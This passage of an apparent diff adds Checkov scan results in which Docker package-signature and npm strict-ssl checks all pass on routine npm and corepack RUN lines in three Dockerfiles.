[ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_8", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_13", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + 